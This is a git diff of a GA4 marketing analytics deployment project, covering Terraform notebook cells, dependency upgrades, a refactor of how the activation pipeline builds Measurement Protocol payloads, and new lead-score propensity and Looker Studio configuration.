"metadata": { + "id": "BGteib5ebsA-", + "cellView": "form" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "#%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.feature_store -auto-approve" + ], + "metadata": { 
+ "cellView": "form", + "id": "dwD5DRRM2Ryl" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.pipelines -auto-approve" + ], + "metadata": { + "cellView": "form", + "id": "KrEr1yXS1_oA" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.activation -auto-approve" + ], + "metadata": { + "collapsed": true, + "cellView": "form", + "id": "7-Qr46vR2bLl" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.monitoring -auto-approve" + ], + "metadata": { + "collapsed": true, + "cellView": "form", + "id": "ElOBpEV3Mtbc" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -auto-approve" + ], + "metadata": { + "cellView": "form", + "id": "eyZNdewu2zQI" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "print(\"SUCCESS!\")" + ], + "metadata": { + "id": "1h7k6jFYpLPO", + "colab": { + "base_uri": "https://localhost:8080/" + }, + "outputId": "266267e5-ac12-4621-ec7f-19e051027edb" + }, + "execution_count": null, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "SUCCESS!\n" + ] + } + ] + } + ] +} \ No newline at end of file diff --git a/pyproject.toml b/pyproject.toml index 3e0abe24..01eaf8aa 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -12,6 +12,15 @@ # See the License for the specific language governing permissions and # limitations under the License. 
+[project] +name = "marketing-analytics-jumpstart" +version = "1.0.0" +description = "Marketing Analytics Jumpstart" +authors = [{name = "Marketing Analytics Solutions Architects", email = "ma-se@google.com"}] +license = "Apache 2.0" +readme = "README.md" +requires-python = ">=3.9,<3.12.0" + [tool.poetry] name = "marketing-analytics-jumpstart" version = "1.0.0" @@ -22,49 +31,55 @@ readme = "README.md" packages = [{include = "python"}] [tool.poetry.dependencies] -python = ">=3.8,<3.11" -google-cloud-aiplatform = "1.52.0" +python = ">=3.9,<3.12.0" +#google-cloud-aiplatform = "1.52.0" +google-cloud-aiplatform = "1.77.0" shapely = "<2.0.0" google-cloud = "^0.34.0" jinja2 = ">=3.0.1,<4.0.0" -pip = "23.3" +pip = "23.3.2" invoke = "2.2.0" ## pyinvoke = "1.0.4" pre-commit = ">=2.14.1,<3.0.0" -pandas = "1.3.5" -google-cloud-bigquery = "2.30.0" +pandas = "1.5.3" +google-cloud-bigquery = "3.21.0" +google-cloud-bigquery-connection = "1.17.0" #google-cloud-pipeline-components = "1.0.33" google-cloud-pipeline-components = "2.6.0" google-auth = "^2.14.1" google-cloud-storage = "^2.6.0" +kfp = "2.4.0" ## Fixing this error: https://stackoverflow.com/questions/76175487/sudden-importerror-cannot-import-name-appengine-from-requests-packages-urlli -kfp = "2.0.0-rc.2" +#kfp = "2.0.0-rc.2" #kfp = {version = "2.0.0-b12", allow-prereleases = true} #kfp = {version = "2.0.0-b16", allow-prereleases = true} -kfp-server-api = "2.0.0-rc.1" +kfp-server-api = "2.0.5" +#kfp-server-api = "2.0.0-rc.1" #kfp-server-api = "2.0.0.a6" #kfp-server-api = "2.0.0b1" -urllib3 = "1.26.18" +urllib3 = "1.26.20" toml = "0.10.2" docker = "^6.0.1" -db-dtypes = "1.2.0" -optuna = "3.2.0" -scikit-learn = "1.2.2" +db-dtypes = "1.3.1" +optuna = "3.6.1" +scikit-learn = "1.5.0" #plotly = "5.16.0" #matplotlib= "3.7.2" #seaborn = "0.12.2" ma-components = {path = "python/base_component_image/", develop = true} -google-cloud-pubsub = "2.15.0" +google-cloud-pubsub = "2.27.2" #google-analytics-admin = "0.17.0" -google-analytics-admin = "0.22.7" +google-analytics-admin = "0.23.3" google-analytics-data = "^0.18.0" pyarrow = "15.0.2" google-auth-oauthlib = "^1.2.1" oauth2client = "^4.1.3" google-cloud-core = "^2.4.1" +sympy="1.13.3" +google-cloud-resource-manager="1.14.0" [tool.poetry.group.component_vertex.dependencies] -google-cloud-aiplatform = "1.52.0" +google-cloud-aiplatform = "1.77.0" shapely = "<2.0.0" toml = "0.10.2" @@ -72,16 +87,16 @@ toml = "0.10.2" ga4-setup = "python.ga4_setup.setup:entry" [tool.poetry.group.test.dependencies] -pytest = "7.0.0" -pytest-env = "0.6.2" -pytest-mock = "3.7.0" +pytest = "7.4.4" +pytest-env = "0.8.2" +pytest-mock = "3.14.0" pytest-variables = {extras = ["yaml"], version = "^2.0.0"} coverage = {extras = ["toml"], version = "^6.5.0"} pytest-cov = "^4.0.0" pytest-xdist = "^3.0.2" [tool.poetry.group.dev.dependencies] -pip = "23.3" +pip = "23.3.2" invoke = "2.2.0" pre-commit = ">=2.14.1,<3.0.0" black = "22.12.0" @@ -118,4 +133,7 @@ parallel = true [tool.coverage.report] fail_under = 70 show_missing = true -skip_empty= true \ No newline at end of file +skip_empty= true + +[tool.uv.workspace] +members = ["python/lookerstudio"] diff --git a/python/activation/main.py b/python/activation/main.py index 6bf3ff15..69c33785 100644 --- a/python/activation/main.py +++ b/python/activation/main.py @@ -62,6 +62,7 @@ def _add_argparse_args(cls, parser): - purchase-propensity-15-15 - purchase-propensity-15-7 - churn-propensity-30-15 + - lead-score-propensity-5-1 activation_type_configuration: The GCS path to the configuration file for 
all activation types. """ @@ -110,6 +111,7 @@ def _add_argparse_args(cls, parser): purchase-propensity-15-15 purchase-propensity-15-7 churn-propensity-30-15 + lead-score-propensity-5-1 ''', required=True ) @@ -330,7 +332,6 @@ class TransformToPayload(beam.DoFn): The DoFn takes the following arguments: - - template_str: The Jinja2 template string used to generate the Measurement Protocol payload. - event_name: The name of the event to be sent to Google Analytics 4. The DoFn yields the following output: @@ -338,33 +339,28 @@ class TransformToPayload(beam.DoFn): - A dictionary containing the Measurement Protocol payload. The DoFn performs the following steps: - 1. Removes bad shaping strings in the `client_id` field. - 2. Renders the Jinja2 template string using the provided data and event name. - 3. Converts the rendered template string into a JSON object. + 2. Converts the rendered template string into a JSON object. 4. Handles any JSON decoding errors. The DoFn is used to ensure that the Measurement Protocol payload is formatted correctly before being sent to Google Analytics 4. """ - def __init__(self, template_str, event_name): + def __init__(self, event_name): """ Initializes the DoFn. Args: - template_str: The Jinja2 template string used to generate the Measurement Protocol payload. event_name: The name of the event to be sent to Google Analytics 4. """ - self.template_str = template_str self.date_format = "%Y-%m-%d" self.date_time_format = "%Y-%m-%d %H:%M:%S.%f %Z" self.event_name = event_name - - - def setup(self): - """ - Sets up the Jinja2 environment. - """ - self.payload_template = Environment(loader=BaseLoader).from_string(self.template_str) + self.consent_obj = { + 'ad_user_data':'GRANTED', + 'ad_personalization':'GRANTED' + } + self.user_property_prefix = 'user_prop_' + self.event_parameter_prefix = 'event_param_' def process(self, element): @@ -384,21 +380,17 @@ def process(self, element): _client_id = element['client_id'].replace(r'', '') _client_id = element['client_id'].replace(r'q=">', '') - - payload_str = self.payload_template.render( - client_id=_client_id, - user_id=self.generate_user_id_key_value_pair(element), - event_timestamp=self.date_to_micro(element["inference_date"]), - event_name=self.event_name, - session_id=element['session_id'], - user_properties=self.generate_user_properties(element), - ) + result = {} - try: - result = json.loads(r'{}'.format(payload_str)) - except json.decoder.JSONDecodeError as e: - logging.error(payload_str) - logging.error(traceback.format_exc()) + result['client_id'] = _client_id + if element['user_id']: + result['user_id'] = element['user_id'] + result['timestamp_micros'] = self.date_to_micro(element["inference_date"]) + result['non_personalized_ads'] = False + result['consent'] = self.consent_obj + result['user_properties'] = self.extract_user_properties(element) + result['events'] = [self.extract_event(element)] + yield result @@ -419,62 +411,40 @@ def date_to_micro(self, date_str): return int(datetime.datetime.strptime(date_str, self.date_format).timestamp() * 1E6) - def generate_param_fields(self, element): + def extract_user_properties(self, element): """ - Generates a JSON string containing the parameter fields of the element. + Generates a dictionary containing the user properties of the element. Args: element: The element to be processed. Returns: - A JSON string containing the parameter fields of the element. + A dictionary containing the user properties of the element. 
""" - element_copy = element.copy() - del element_copy['client_id'] - del element_copy['user_id'] - del element_copy['session_id'] - del element_copy['inference_date'] - element_copy = {k: v for k, v in element_copy.items() if v} - return json.dumps(element_copy, cls=DecimalEncoder) + user_properties = {} + for k, v in element.items(): + if k.startswith(self.user_property_prefix) and v: + user_properties[k[len(self.user_property_prefix):]] = {'value': str(v)} + return user_properties - - def generate_user_properties(self, element): - """ - Generates a JSON string containing the user properties of the element. - - Args: - element: The element to be processed. - - Returns: - A JSON string containing the user properties of the element. + def extract_event(self, element): """ - element_copy = element.copy() - del element_copy['client_id'] - del element_copy['user_id'] - del element_copy['session_id'] - del element_copy['inference_date'] - user_properties_obj = {} - for k, v in element_copy.items(): - if v: - user_properties_obj[k] = {'value': str(v)} - return json.dumps(user_properties_obj, cls=DecimalEncoder) - + Generates a dictionary containing the event parameters from the element. - def generate_user_id_key_value_pair(self, element): - """ - If the user_id field is not empty generate the key/value string with the user_id. - else return empty string Args: element: The element to be processed. Returns: - A string containing the key and value with the user_id. + A dictionary containing the event parameters from the element. """ - user_id = element['user_id'] - if user_id: - return f'"user_id": "{user_id}",' - return "" - + event = { + 'name': self.event_name, + 'params': {} + } + for k, v in element.items(): + if k.startswith(self.event_parameter_prefix) and v: + event['params'][k[len(self.event_parameter_prefix):]] = v + return event @@ -519,8 +489,7 @@ def load_activation_type_configuration(args): # Create the activation type configuration dictionary. 
configuration = { 'activation_event_name': activation_config['activation_event_name'], - 'source_query_template': Environment(loader=BaseLoader).from_string(gcs_read_file(args.project, activation_config['source_query_template']).replace('\n', ' ')), - 'measurement_protocol_payload_template': gcs_read_file(args.project, activation_config['measurement_protocol_payload_template']) + 'source_query_template': Environment(loader=BaseLoader).from_string(gcs_read_file(args.project, activation_config['source_query_template']).replace('\n', ' ')) } return configuration @@ -589,7 +558,7 @@ def run(argv=None): query=load_from_source_query, use_json_exports=True, use_standard_sql=True) - | 'Prepare Measurement Protocol API payload' >> beam.ParDo(TransformToPayload(activation_type_configuration['measurement_protocol_payload_template'], activation_type_configuration['activation_event_name'])) + | 'Prepare Measurement Protocol API payload' >> beam.ParDo(TransformToPayload(activation_type_configuration['activation_event_name'])) | 'POST event to Measurement Protocol API' >> beam.ParDo(CallMeasurementProtocolAPI(activation_options.ga4_measurement_id, activation_options.ga4_api_secret, debug=activation_options.use_api_validation)) ) diff --git a/python/activation/requirements.txt b/python/activation/requirements.txt index 996c59a7..1809103f 100644 --- a/python/activation/requirements.txt +++ b/python/activation/requirements.txt @@ -1 +1 @@ -jinja2==3.1.4 +jinja2==3.1.5 diff --git a/python/base_component_image/Dockerfile b/python/base_component_image/Dockerfile index 1e555421..4ee0156b 100644 --- a/python/base_component_image/Dockerfile +++ b/python/base_component_image/Dockerfile @@ -12,7 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. -FROM python:3.8.18-slim +FROM python:3.10.16-slim RUN pip install --upgrade pip RUN pip install poetry @@ -22,5 +22,5 @@ ENV PYTHONPATH=${PYTHONPATH}:${PWD} COPY ./pyproject.toml ./README.md /app/ COPY ./ma_components /app/ma_components -RUN poetry config virtualenvs.create false # so that installations is on global python3.7 and not in venv +RUN poetry config virtualenvs.create false # so that installations is on global python3.10 and not in venv RUN poetry install \ No newline at end of file diff --git a/python/base_component_image/pyproject.toml b/python/base_component_image/pyproject.toml index 3ce3fc2f..61352f50 100644 --- a/python/base_component_image/pyproject.toml +++ b/python/base_component_image/pyproject.toml @@ -2,32 +2,37 @@ name = "ma-components" version = "1.0.0" description = "contains components used in marketing analytics project. 
the need is to package the components and containerise so that they can be used from the python function based component" -authors = ["Christos Aniftos "] +authors = ["Marketing Analytics Solutions Architects "] +license = "Apache 2.0" readme = "README.md" packages = [{include = "ma_components"}] [tool.poetry.dependencies] -python = ">=3.8,<3.11" -pip = "23.3" +python = ">=3.9,<3.12.0" +pip = "23.3.2" +kfp = "2.4.0" ## Fixing this error: https://stackoverflow.com/questions/76175487/sudden-importerror-cannot-import-name-appengine-from-requests-packages-urlli -kfp = "2.0.0-rc.2" +#kfp = "2.0.0-rc.2" #kfp = {version = "2.0.0-b12", allow-prereleases = true} #kfp = {version = "2.0.0-b16", allow-prereleases = true} -kfp-server-api = "2.0.0-rc.1" +kfp-server-api = "2.0.5" +#kfp-server-api = "2.0.0-rc.1" #kfp-server-api = "2.0.0.a6" #kfp-server-api = "2.0.0b1" -urllib3 = "1.26.18" +urllib3 = "1.26.20" toml = "^0.10.2" docker = "^6.0.1" -google-cloud-bigquery = "2.30.0" -google-cloud-aiplatform = "1.52.0" +google-cloud-bigquery = "3.21.0" +google-cloud-bigquery-connection = "1.17.0" +#google-cloud-aiplatform = "1.52.0" +google-cloud-aiplatform = "1.77.0" shapely = "<2.0.0" -google-cloud-pubsub = "2.15.0" +google-cloud-pubsub = "2.27.2" #google-cloud-pipeline-components = "1.0.33" google-cloud-pipeline-components = "2.6.0" -db-dtypes = "1.2.0" -optuna = "3.2.0" -scikit-learn = "1.2.2" +db-dtypes = "1.3.1" +optuna = "3.6.1" +scikit-learn = "1.5.0" #plotly = "5.16.0" #matplotlib= "3.7.2" #seaborn = "0.12.2" @@ -35,6 +40,8 @@ pyarrow = "15.0.2" google-auth-oauthlib = "^1.2.1" oauth2client = "^4.1.3" google-cloud-core = "^2.4.1" +sympy="1.13.3" +google-cloud-resource-manager="1.14.0" [build-system] requires = ["poetry-core>=1.0.0"] diff --git a/python/function/trigger_activation/requirements.txt b/python/function/trigger_activation/requirements.txt index 1b6d3ebf..2c76e274 100644 --- a/python/function/trigger_activation/requirements.txt +++ b/python/function/trigger_activation/requirements.txt @@ -1,2 +1,2 @@ -functions-framework==3.7.0 -google-cloud-dataflow-client==0.8.10 \ No newline at end of file +functions-framework==3.8.2 +google-cloud-dataflow-client==0.8.15 \ No newline at end of file diff --git a/python/ga4_setup/setup.py b/python/ga4_setup/setup.py index 03204812..dd4c885d 100644 --- a/python/ga4_setup/setup.py +++ b/python/ga4_setup/setup.py @@ -276,6 +276,7 @@ def create_custom_dimensions(configuration: map): create_custom_dimensions_for('CLTV', ['cltv_decile'], existing_dimensions, configuration) create_custom_dimensions_for('Auto Audience Segmentation', ['a_a_s_prediction'], existing_dimensions, configuration) create_custom_dimensions_for('Churn Propensity', ['c_p_prediction', 'c_p_decile'], existing_dimensions, configuration) + create_custom_dimensions_for('Lead Score Propensity', ['l_s_p_prediction', 'l_s_p_decile'], existing_dimensions, configuration) @@ -513,9 +514,14 @@ def entry(): if args.ga4_resource == "check_property_type": property = get_property(configuration) - result = { - 'supported': f"{property.property_type == property.property_type.PROPERTY_TYPE_ORDINARY}" - } + is_property_supported = set((property.property_type.PROPERTY_TYPE_ORDINARY, property.property_type.PROPERTY_TYPE_SUBPROPERTY, property.property_type.PROPERTY_TYPE_ROLLUP)) + + result = {} + if property.property_type in is_property_supported: + result = {'supported': "True"} + else: + result = {'supported': "False"} + print(json.dumps(result)) # python setup.py --ga4_resource=custom_events diff --git 
a/python/lookerstudio/README.md b/python/lookerstudio/README.md index dc019f63..aa624b3f 100644 --- a/python/lookerstudio/README.md +++ b/python/lookerstudio/README.md @@ -1,5 +1,30 @@ # Marketing Analytics Jumpstart Looker Studio Dashboard +## Prerequisites +This Looker Studio dashboard relies on specific BigQuery tables that should be present in your project. These tables are created during the deployment of the Marketing Analytics Jumpstart and by the data processing pipelines of the solution. +Before deploying the dashboard, make sure the pre-requisite tables exist. If tables are missing, ensure the corresponding pipelines have run successfully. + +| Table | Dataset | Source Process | Troubleshooting Link | +| -------- | ------- | ------- | --------- | +| session_date | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| session_device_daily_metrics | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| latest | aggregated_predictions | feature-store terraform module and aggregated_predictions.aggregate_last_day_predictions stored procedure | [Aggregating stored prodedure](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_predictions!3saggregate_last_day_predictions) | +| resource_link | maj_dashboard | monitor terraform module | [Dashboard dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_dashboard) | +| dataform_googleapis_com_workflow_invocation_completion | maj_logs | monitor terraform module | [maj_logs dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_logs) | +| event | marketing_ga4_base_* | Dataform Execution | [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| session_location_daily_metrics | marketing_ga4_v1_* | Dataform Execution | [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| aggregated_value_based_bidding_volume_weekly | aggregated_vbb | feature-store terraform module and aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation stored procedure | [aggregated_value_based_bidding_explanation_preparation](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_vbb!3sinvoke_aggregated_value_based_bidding_explanation_preparation) | +| event_page | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| unique_page_views | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| aggregated_value_based_bidding_correlation | aggregated_vbb | feature-store terraform module and aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation stored procedure | [aggregated_value_based_bidding_explanation_preparation](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_vbb!3sinvoke_aggregated_value_based_bidding_explanation_preparation) | +| ad_performance_conversions | 
marketing_ads_v1_* | Dataform Execution | [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| user_behaviour_revenue_insights_daily | gemini_insights | feature-store terraform module and gemini_insights.user_behaviour_revenue_insights stored procedure | [User Behaviour Revenue Insights](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2sgemini_insights!3suser_behaviour_revenue_insights) | +| dataflow_googleapis_com_job_message | maj_logs | monitor terraform module | [maj_logs dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_logs) | +| vbb_weights | aggregated_vbb | feature-store terraform module and VBB explanation pipeline | [VBB Explanation Pipeline](https://console.cloud.google.com/vertex-ai/pipelines/schedules) | +| page_session_daily_metrics | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| aiplatform_googleapis_com_pipeline_job_events | maj_logs | monitor terraform module | [maj_logs dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_logs) | +| aggregated_value_based_bidding_volume_daily | aggregated_vbb | feature-store terraform module and aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation stored procedure | [aggregated_value_based_bidding_explanation_preparation](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_vbb!3sinvoke_aggregated_value_based_bidding_explanation_preparation) | + ## Extract Looker Studio dashboard URL Extract the URL used to create the dashboard from the Terraform output value: diff --git a/python/lookerstudio/config.ini b/python/lookerstudio/config.ini index ed0c91d1..3c9d365b 100644 --- a/python/lookerstudio/config.ini +++ b/python/lookerstudio/config.ini @@ -33,15 +33,17 @@ [COMMON] # TODO: Replace the values in this section with your own -project = project_id +project = project_id ga4_dataset = marketing_ga4_v1_prod ga4_base_dataset = marketing_ga4_base_prod ads_dataset = marketing_ads_v1_prod +ads_base_dataset = marketing_ads_base_prod dashboard_dataset = maj_dashboard logs_dataset = maj_logs aggregated_vbb_dataset = aggregated_vbb aggregated_predictions_dataset = aggregated_predictions gemini_insights_dataset = gemini_insights +purchase_propensity_dataset = purchase_propensity # The below sections can be used as is unless you've used a custom dataset & view naming convention @@ -188,3 +190,19 @@ type = TABLE tableId = user_behaviour_revenue_insights_daily datasetId = ${COMMON:gemini_insights_dataset} projectId = ${COMMON:project} + +[Bid Strategy ROAS VBB] +ds_alias = Bid_strategy_roas_vbb +connector = bigQuery +type = TABLE +tableId = bid_strategy_roas +datasetId = ${COMMON:ads_base_dataset} +projectId = ${COMMON:project} + +[Prediction Stats] +ds_alias = Prediction_stats +connector = bigQuery +type = TABLE +tableId = prediction_stats +datasetId = ${COMMON:purchase_propensity_dataset} +projectId = ${COMMON:project} diff --git a/python/lookerstudio/lookerstudio_deployment.py b/python/lookerstudio/lookerstudio_deployment.py index 3e0c497c..59139fd1 100644 --- a/python/lookerstudio/lookerstudio_deployment.py +++ b/python/lookerstudio/lookerstudio_deployment.py @@ -28,7 +28,7 @@ # Constants -CONFIG_FILE = "config.ini" +CONFIG_FILE = "python/lookerstudio/config.ini" BASE_URL = 
"https://lookerstudio.google.com/reporting/create?" REPORT_ID = "f61f65fe-4991-45fc-bcdc-80593966f28c" REPORT_NAME = "Marketing%20Analytics%20Sample" diff --git a/python/lookerstudio/pyproject.toml b/python/lookerstudio/pyproject.toml index 12dbe21b..4bb61293 100644 --- a/python/lookerstudio/pyproject.toml +++ b/python/lookerstudio/pyproject.toml @@ -1,3 +1,11 @@ +[project] +name = "lookerstudio" +version = "0.1.0" +description = "Deployment process for the Marketing Analytics Jumpstart Looker Studio dashboard." +readme = "README.md" +requires-python = ">=3.7.1" +dependencies = [] + [tool.poetry] name = "looker studio deployment" version = "0.1.0" @@ -7,7 +15,7 @@ license = "Apache 2.0" readme = "README.md" [tool.poetry.dependencies] -python = ">=3.7.1" +python = ">=3.9" google-cloud-bigquery = "^3.10.0" google-auth = "^2.17.3" google-api-core = "^2.11.0" diff --git a/python/pipelines/automl_tabular_pl_v4.yaml b/python/pipelines/automl_tabular_pl_v4.yaml index 4d20b803..6bdc8cfb 100644 --- a/python/pipelines/automl_tabular_pl_v4.yaml +++ b/python/pipelines/automl_tabular_pl_v4.yaml @@ -11151,21 +11151,21 @@ root: isOptional: true parameterType: BOOLEAN distill_batch_predict_machine_type: - defaultValue: n1-standard-16 + defaultValue: n1-highmem-8 description: 'The prediction server machine type for batch predict component in the model distillation.' isOptional: true parameterType: STRING distill_batch_predict_max_replica_count: - defaultValue: 25.0 + defaultValue: 5.0 description: 'The max number of prediction server for batch predict component in the model distillation.' isOptional: true parameterType: NUMBER_INTEGER distill_batch_predict_starting_replica_count: - defaultValue: 25.0 + defaultValue: 5.0 description: 'The initial number of prediction server for batch predict component in the model distillation.' @@ -11201,14 +11201,14 @@ root: isOptional: true parameterType: STRING evaluation_batch_explain_max_replica_count: - defaultValue: 10.0 + defaultValue: 5.0 description: 'The max number of prediction server for batch explain components during evaluation.' isOptional: true parameterType: NUMBER_INTEGER evaluation_batch_explain_starting_replica_count: - defaultValue: 10.0 + defaultValue: 5.0 description: 'The initial number of prediction server for batch explain components during evaluation.' @@ -11222,14 +11222,14 @@ root: isOptional: true parameterType: STRING evaluation_batch_predict_max_replica_count: - defaultValue: 20.0 + defaultValue: 5.0 description: 'The max number of prediction server for batch predict components during evaluation.' isOptional: true parameterType: NUMBER_INTEGER evaluation_batch_predict_starting_replica_count: - defaultValue: 20.0 + defaultValue: 5.0 description: 'The initial number of prediction server for batch predict components during evaluation.' @@ -11279,7 +11279,7 @@ root: description: The GCP region that runs the pipeline components. parameterType: STRING max_selected_features: - defaultValue: 1000.0 + defaultValue: 100.0 description: number of features to select for training. isOptional: true parameterType: NUMBER_INTEGER @@ -11356,7 +11356,7 @@ root: isOptional: true parameterType: BOOLEAN stage_1_num_parallel_trials: - defaultValue: 35.0 + defaultValue: 5.0 description: Number of parallel trails for stage 1. isOptional: true parameterType: NUMBER_INTEGER @@ -11367,7 +11367,7 @@ root: isOptional: true parameterType: LIST stage_2_num_parallel_trials: - defaultValue: 35.0 + defaultValue: 5.0 description: Number of parallel trails for stage 2. 
isOptional: true parameterType: NUMBER_INTEGER diff --git a/python/pipelines/compiler.py b/python/pipelines/compiler.py index 6b5224dd..97bbc62c 100644 --- a/python/pipelines/compiler.py +++ b/python/pipelines/compiler.py @@ -31,6 +31,7 @@ 'vertex_ai.pipelines.feature-creation-purchase-propensity.execution': "pipelines.feature_engineering_pipelines.purchase_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-churn-propensity.execution': "pipelines.feature_engineering_pipelines.churn_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-customer-ltv.execution': "pipelines.feature_engineering_pipelines.customer_lifetime_value_feature_engineering_pipeline", + 'vertex_ai.pipelines.feature-creation-lead-score-propensity.execution': "pipelines.feature_engineering_pipelines.lead_score_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.auto_segmentation.training': "pipelines.auto_segmentation_pipelines.training_pl", 'vertex_ai.pipelines.auto_segmentation.prediction': "pipelines.auto_segmentation_pipelines.prediction_pl", 'vertex_ai.pipelines.segmentation.training': "pipelines.segmentation_pipelines.training_pl", @@ -39,6 +40,8 @@ 'vertex_ai.pipelines.purchase_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.churn_propensity.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.churn_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", + 'vertex_ai.pipelines.lead_score_propensity.training': None, # tabular workflows pipelines is precompiled + 'vertex_ai.pipelines.lead_score_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.propensity_clv.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.clv.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.clv.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_regression_pl", diff --git a/python/pipelines/components/bigquery/component.py b/python/pipelines/components/bigquery/component.py index c4aa542f..e52a511e 100644 --- a/python/pipelines/components/bigquery/component.py +++ b/python/pipelines/components/bigquery/component.py @@ -879,7 +879,7 @@ def bq_dynamic_query_exec_output( # Construct query template template = jinja2.Template(""" CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.{{create_table}}` AS ( - SELECT + SELECT DISTINCT feature, ROUND(100 * SUM(users) OVER (ORDER BY users DESC) / SUM(users) OVER (), 2) as cumulative_traffic_percent, @@ -892,7 +892,7 @@ def bq_dynamic_query_exec_output( SELECT user_pseudo_id, user_id, - page_location as page_path + LOWER(page_location) as page_path FROM `{{mds_project_id}}.{{mds_dataset}}.event` WHERE event_name = 'page_view' @@ -1423,4 +1423,4 @@ def execute_query_with_retries(query): logging.error(f"Query failed after retries: {e}") - \ No newline at end of file + diff --git a/python/pipelines/feature_engineering_pipelines.py b/python/pipelines/feature_engineering_pipelines.py index deb7b88b..a15ffa12 100644 --- a/python/pipelines/feature_engineering_pipelines.py +++ b/python/pipelines/feature_engineering_pipelines.py @@ -196,8 +196,73 @@ def audience_segmentation_feature_engineering_pipeline( location=location, query=query_audience_segmentation_inference_preparation, timeout=timeout).set_display_name('audience_segmentation_inference_preparation').after(*phase_1) - - + 
